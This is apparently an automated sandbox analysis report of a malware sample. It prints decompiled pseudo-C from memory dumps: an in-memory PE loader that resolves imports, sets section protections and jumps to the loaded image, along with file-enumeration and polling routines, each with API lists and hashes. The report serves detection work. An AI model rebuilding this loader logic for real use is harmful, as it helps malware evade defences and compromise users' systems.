Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CountCreateHeapSleepSwitchThreadTick
String ID:
API String ID: 377297877-0
Opcode ID: 06340dcac3d0744c5870cf5160c52ef81de76875d785078e52cbf56b1f00275b
Instruction ID: ee3628668feca04f83c2622ce75d97f051099670ec9419954bcbb40541a77ae8
Opcode Fuzzy Hash: 06340dcac3d0744c5870cf5160c52ef81de76875d785078e52cbf56b1f00275b
Instruction Fuzzy Hash: B3F0CD36A00701ABDB126B74BC49B1E3AA4AF04396F940033F808D6264EB30C8008B75

Uniqueness

Uniqueness Score: -1.00%

Function 00511338, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00511338(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x00511342
0x00511347
0x00511353
0x00511360
0x00511366
0x00511368
0x0051136e
0x005113db
0x005113e2
0x005113e2
0x00511370
0x00511373
0x00511373
0x00511377
0x00000000
0x00000000
0x00511379
0x0051137d
0x00511395
0x00511399
0x005113ad
0x0051139b
0x0051139b
0x005113a1
0x005113a5
0x005113a5
0x0051137f
0x0051137f
0x0051138b
0x00511390
0x00511390
0x005113be
0x005113c2
0x005113ca
0x005113ca
0x005113cd
0x005113d0
0x005113d3
0x005113d9
0x00000000
0x00000000
0x00000000
0x00000000
0x005113d9
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?), ref: 00511366
VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 005113BE
GetLastError.KERNEL32 ref: 005113C4

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 46b1b239d79eeab649715287d97b105324e8ac0409943ec87a5cc8f963d3b3f0
Instruction ID: dfdbfdd448d064f3e78c2e48e26bde6ee5a3be5a3b517cbd4e8287885eb7d309
Opcode Fuzzy Hash: 46b1b239d79eeab649715287d97b105324e8ac0409943ec87a5cc8f963d3b3f0
Instruction Fuzzy Hash: 7121AEB2900209EFEB208F95C884FFDBBF4FB14354F204899E651A7156D3749AC8DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00511280, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00511280() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x514144;
				if( *0x51412c > 5) {
					_t16 = _t15 + 0x5150f4;
				} else {
					_t16 = _t15 + 0x5150b1;
				}
				E005117EF(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E005116AC( &_v32,  &_v16,  *0x514140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x514138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E00511006(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x514138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E00511151(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00511286
0x00511297
0x005112a1
0x00511299
0x00511299
0x00511299
0x005112a8
0x005112b1
0x005112b6
0x005112d4
0x0051132f
0x005112d6
0x005112dc
0x005112e2
0x005112e2
0x005112f0
0x005112f4
0x005112fb
0x005112fd
0x00511301
0x00511303
0x0051130a
0x0051131e
0x0051130c
0x00511312
0x00511317
0x0051130a
0x00511326
0x00511326
0x00511331

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 005112DC
memcpy.NTDLL(?,?,00000002), ref: 00511312
ExitThread.KERNEL32 ref: 00511331

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: a34826ad2f4a2abf6be6da72aab913ef6518c0093f20c974ff07883c70dbc8ee
Instruction ID: 25f80ac80ab67d491afac0ad98d2123edc3ace5f7b94b96e20f1c663b2c2aae3
Opcode Fuzzy Hash: a34826ad2f4a2abf6be6da72aab913ef6518c0093f20c974ff07883c70dbc8ee
Instruction Fuzzy Hash: 1911D071504A02AFE710EBA1DC8CDD77BECBB68300F1448A9F615D7161E730E588CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00D937B4, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D937B4(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00D956F9(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xd9d2a4; // 0x3e3a5a8
						_t20 = _t68 + 0xd9e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00D990E9(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00d937ba
0x00d937bd
0x00d937cd
0x00d937d6
0x00d937da
0x00d938a8
0x00d938ae
0x00d938ae
0x00d937f4
0x00d937f9
0x00d937fd
0x00d93803
0x00d93808
0x00d9380f
0x00d9381e
0x00d9381e
0x00d93822
0x00d93824
0x00d93830
0x00d9383b
0x00d93846
0x00d9384a
0x00d93854
0x00d93858
0x00d9385a
0x00d9385f
0x00d93866
0x00d93876
0x00d93876
0x00d9385f
0x00d93858
0x00d93878
0x00d9387d
0x00d93882
0x00d93882
0x00d93885
0x00d9388e
0x00d93893
0x00d93893
0x00d93898
0x00d9389d
0x00d9389d
0x00d93898
0x00d93822
0x00d9389f
0x00d938a5
0x00000000

APIs

Part of subcall function 00D956F9: SysAllocString.OLEAUT32(80000002), ref: 00D95756
Part of subcall function 00D956F9: SysFreeString.OLEAUT32(00000000), ref: 00D957BC

SysFreeString.OLEAUT32(?), ref: 00D93893
SysFreeString.OLEAUT32(00D98CCC), ref: 00D9389D

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: fc592a23ba8752948809177317563324cf5cfb1538b6038744a500116ba0b577
Instruction ID: 21552096e341cf44977e0213bdf86d7ff1dc4fbcfdac7ea0ff2cb31590432551
Opcode Fuzzy Hash: fc592a23ba8752948809177317563324cf5cfb1538b6038744a500116ba0b577
Instruction Fuzzy Hash: 0F310776900219EFCF15DFA9C888CABBB7AFBC97407144658F8169B210D632DE51DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D94509, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D94509(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xd9d330;
				E00D93D1E();
				while(1) {
					_t8 = E00D9523B(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00D9A5A3(_t14);
					if(_t15 == 0) {
						HeapFree( *0xd9d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00D93D1E();
					if(_t19 != 0) {
						_t22 =  *0xd9d338; // 0x4bd9b60
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x00d94511
0x00d94515
0x00d94516
0x00d94517
0x00d9451c
0x00d94521
0x00d94528
0x00d9452f
0x00000000
0x00000000
0x00d94531
0x00d94536
0x00d94537
0x00d9453e
0x00d94558
0x00000000
0x00d94540
0x00d94540
0x00d94542
0x00d94545
0x00d94549
0x00000000
0x00000000
0x00d9454b
0x00d94549
0x00d94560
0x00d94560
0x00d94562
0x00d94569
0x00d9456b
0x00d94571
0x00d94578
0x00d94588
0x00d94580
0x00d94583
0x00d94583
0x00d9458b
0x00d9458b
0x00d94594
0x00d94594
0x00d9455e
0x00000000

APIs

Part of subcall function 00D93D1E: GetProcAddress.KERNEL32(36776F57,00D94521), ref: 00D93D39

Part of subcall function 00D9523B: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00D95266
Part of subcall function 00D9523B: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00D95288
Part of subcall function 00D9523B: memset.NTDLL ref: 00D952A2
Part of subcall function 00D9523B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00D952E0
Part of subcall function 00D9523B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00D952F4
Part of subcall function 00D9523B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00D9530B
Part of subcall function 00D9523B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00D95317
Part of subcall function 00D9523B: lstrcat.KERNEL32(?,642E2A5C), ref: 00D95358
Part of subcall function 00D9523B: FindFirstFileA.KERNELBASE(?,?), ref: 00D9536E

Part of subcall function 00D9A5A3: lstrlen.KERNEL32(?,00000000,00D9D330,00000001,00D9453C,00D9D00C,00D9D00C,00000000,00000005,00000000,00000000,?,?,?,00D9857A,?), ref: 00D9A5AC
Part of subcall function 00D9A5A3: mbstowcs.NTDLL ref: 00D9A5D3
Part of subcall function 00D9A5A3: memset.NTDLL ref: 00D9A5E5

HeapFree.KERNEL32(00000000,00D9D00C,00D9D00C,00D9D00C,00000000,00000005,00000000,00000000,?,?,?,00D9857A,?,00D9D00C,?,?), ref: 00D94558

Strings

Uxt, xrefs: 00D94558

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID: Uxt
API String ID: 983081259-1536154274
Opcode ID: 49eab18327d7b1621b216e41dc8e4d4aa56f7c53c5e39e4eb0c2847b1821815c
Instruction ID: 0e64cc15adba1ef5276211c82d59159745900d7a7ae7facc375b4e7733c51fa7
Opcode Fuzzy Hash: 49eab18327d7b1621b216e41dc8e4d4aa56f7c53c5e39e4eb0c2847b1821815c
Instruction Fuzzy Hash: 10012836200214ABEF505FEACC81E7AB69DEB41764F960036F944C6251D670CD835374

Uniqueness

Uniqueness Score: -1.00%

Function 00D946B8, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D946B8(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E00D959CA(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E00D9424B(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0xd9d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}

0x00d946c0
0x00d94717
0x00d9471c
0x00d946c2
0x00d946dc
0x00d946e0
0x00d946e5
0x00d946e7
0x00d946f9
0x00d94705
0x00d946e9
0x00d946e9
0x00d946ee
0x00d946f3
0x00d946f3
0x00d946e7
0x00d946e0
0x00d94722

APIs

HeapFree.KERNEL32(00000000,?,00000000,80000002,747DF710,?,?,747DF710,00000000,?,00D96ABC,?,004F0053,04BD9358,00000000,?), ref: 00D94705

Strings

Uxt, xrefs: 00D94705

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: 3b716d02144036d1434f4e7846a5e07048340b911c67a0ed35c48ef4562fddca
Instruction ID: 7141d6f63b6b4a23ae1d937dacd96614be1db4d67518a399a7ead897c052f30c
Opcode Fuzzy Hash: 3b716d02144036d1434f4e7846a5e07048340b911c67a0ed35c48ef4562fddca
Instruction Fuzzy Hash: 1301813210065DFBCF22DF94CC01FAA7B65FF19750F048029FA199A162D731C921DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D959CA, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00D959CA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xd9d2a4; // 0x3e3a5a8
				_t4 = _t15 + 0xd9e39c; // 0x4bd8944
				_t20 = _t4;
				_t6 = _t15 + 0xd9e124; // 0x650047
				_t17 = E00D937B4(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00D92476(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00d959d4
0x00d959db
0x00d959dc
0x00d959dd
0x00d959de
0x00d959e4
0x00d959e9
0x00d959e9
0x00d959f3
0x00d95a05
0x00d95a0c
0x00d95a3a
0x00d95a0e
0x00d95a10
0x00d95a15
0x00d95a37
0x00d95a17
0x00d95a1a
0x00d95a21
0x00d95a26
0x00d95a28
0x00d95a28
0x00d95a2d
0x00d95a2d
0x00d95a15
0x00d95a41

APIs

Part of subcall function 00D937B4: SysFreeString.OLEAUT32(?), ref: 00D93893

Part of subcall function 00D92476: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00D94942,004F0053,00000000,?), ref: 00D9247F
Part of subcall function 00D92476: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00D94942,004F0053,00000000,?), ref: 00D924A9
Part of subcall function 00D92476: memset.NTDLL ref: 00D924BD

SysFreeString.OLEAUT32(00000000), ref: 00D95A2D

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 4c6765a5e2dcd1c6b2acd821d3a0f99f591e399a6aabc095964a186671e9be90
Instruction ID: 0ec3da62d370a53185a28cd4de9e833a7c58d43f61c56bbe375d8d38d072e08c
Opcode Fuzzy Hash: 4c6765a5e2dcd1c6b2acd821d3a0f99f591e399a6aabc095964a186671e9be90
Instruction Fuzzy Hash: 7901B832500629BFDF12EFA8DC409AEBBB9FF08344F008521E905E7260E371E91287B4

Uniqueness

Uniqueness Score: -1.00%

Function 005117EF, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E005117EF(void* __eax, intOrPtr _a4) {

				 *0x514150 =  *0x514150 & 0x00000000;
				_push(0);
				_push(0x51414c);
				_push(1);
				_push(_a4);
				 *0x514148 = 0xc; // executed
				L005111E4(); // executed
				return __eax;
			}

0x005117ef
0x005117f6
0x005117f8
0x005117fd
0x005117ff
0x00511803
0x0051180d
0x00511812

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(005112AD,00000001,0051414C,00000000), ref: 0051180D

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 167b4a7305af9fb79854ce40c4d71966c56e98fd4d978eaa046b84c4b12f6328
Instruction ID: 50cd5ae2797893a714e1f2b8111b536e168edc769e8d660a038e63f179d1eb90
Opcode Fuzzy Hash: 167b4a7305af9fb79854ce40c4d71966c56e98fd4d978eaa046b84c4b12f6328
Instruction Fuzzy Hash: 35C04CB41C0341B6F6219B809C4AFC57E917771705F155505F610256D1C3F514D8DD1D

Uniqueness

Uniqueness Score: -1.00%

Function 00D96D10, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D96D10(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xd9d238, 0, _a4); // executed
				return _t2;
			}

0x00d96d1c
0x00d96d22

APIs

RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e1df9a6d192321ce589acfd1ae4c78ce6a241b2c9f7d0d50bb36f4059f1f7acc
Instruction ID: d729c02d4d598808227d41123d30a462ec824693cffb89efef12343e7d7fcf8e
Opcode Fuzzy Hash: e1df9a6d192321ce589acfd1ae4c78ce6a241b2c9f7d0d50bb36f4059f1f7acc
Instruction Fuzzy Hash: 04B00275554300EBDA119B50DD09F05FB62AB54B01F119516B2459827487715461EB39

Uniqueness

Uniqueness Score: -1.00%

Function 00511151, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00511151(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E00511C1F( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E00511984( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E00511D05(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E00511338(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E00511628(_t35);
					L8:
					return _t28;
				}
			}

0x00511159
0x00511176
0x0051117d
0x005111dc
0x00000000
0x0051117f
0x0051117f
0x00511189
0x0051118d
0x00511192
0x0051119b
0x0051119f
0x005111a4
0x005111a9
0x005111ad
0x005111b2
0x005111b3
0x005111b7
0x005111bc
0x005111c4
0x005111c4
0x005111bc
0x005111ad
0x0051119f
0x005111c6
0x005111cf
0x005111d3
0x005111dd
0x005111e3
0x005111e3

APIs

Part of subcall function 00511C1F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0051117B,?,?,?), ref: 00511C44
Part of subcall function 00511C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00511C66
Part of subcall function 00511C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00511C7C
Part of subcall function 00511C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00511C92
Part of subcall function 00511C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00511CA8
Part of subcall function 00511C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00511CBE

Part of subcall function 00511984: memcpy.NTDLL(?,?,?,?,?,?,?,?,00511189,?,?,?,?,?), ref: 005119BB
Part of subcall function 00511984: memcpy.NTDLL(?,?,?), ref: 005119F0

Part of subcall function 00511D05: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?), ref: 00511D3B
Part of subcall function 00511D05: lstrlenA.KERNEL32(?), ref: 00511D51
Part of subcall function 00511D05: memset.NTDLL ref: 00511D5B
Part of subcall function 00511D05: GetProcAddress.KERNEL32(?,00000002), ref: 00511DBE
Part of subcall function 00511D05: lstrlenA.KERNEL32(-00000002), ref: 00511DD3
Part of subcall function 00511D05: memset.NTDLL ref: 00511DDD

Part of subcall function 00511338: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?), ref: 00511366
Part of subcall function 00511338: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 005113BE
Part of subcall function 00511338: GetLastError.KERNEL32 ref: 005113C4

GetLastError.KERNEL32(?,?,?,?), ref: 005111BE

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: 39b7db6c8ad78c6a56dc8f3086b15057a15677c4eb19588dbbc429dcc7ff23be
Instruction ID: 8ac0763c4656a3703c7eb2def92b1f164145f4b4882a7b72077736fc46d08f70
Opcode Fuzzy Hash: 39b7db6c8ad78c6a56dc8f3086b15057a15677c4eb19588dbbc429dcc7ff23be
Instruction Fuzzy Hash: 9B11A772640B127BEB206AA98C89EEBBAFCBF54354B0005A8FB01D3201EA50ED45C794

Uniqueness

Uniqueness Score: -1.00%

Function 00D93B9B, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00D93B9B(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00d93b9b
0x00d93ba8
0x00d93ba9
0x00d93baa
0x00d93bb1
0x00d93bdf
0x00d93be0
0x00d93be3
0x00d93be9
0x00000000
0x00000000
0x00d93bc8
0x00d93bd2
0x00d93bd9
0x00000000
0x00d93bca
0x00d93bcd
0x00d93bed
0x00d93bcf
0x00d93bcf
0x00000000
0x00d93bcf
0x00d93bcd
0x00d93bf4
0x00d93bfa
0x00d93bfa
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00D93BE3

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
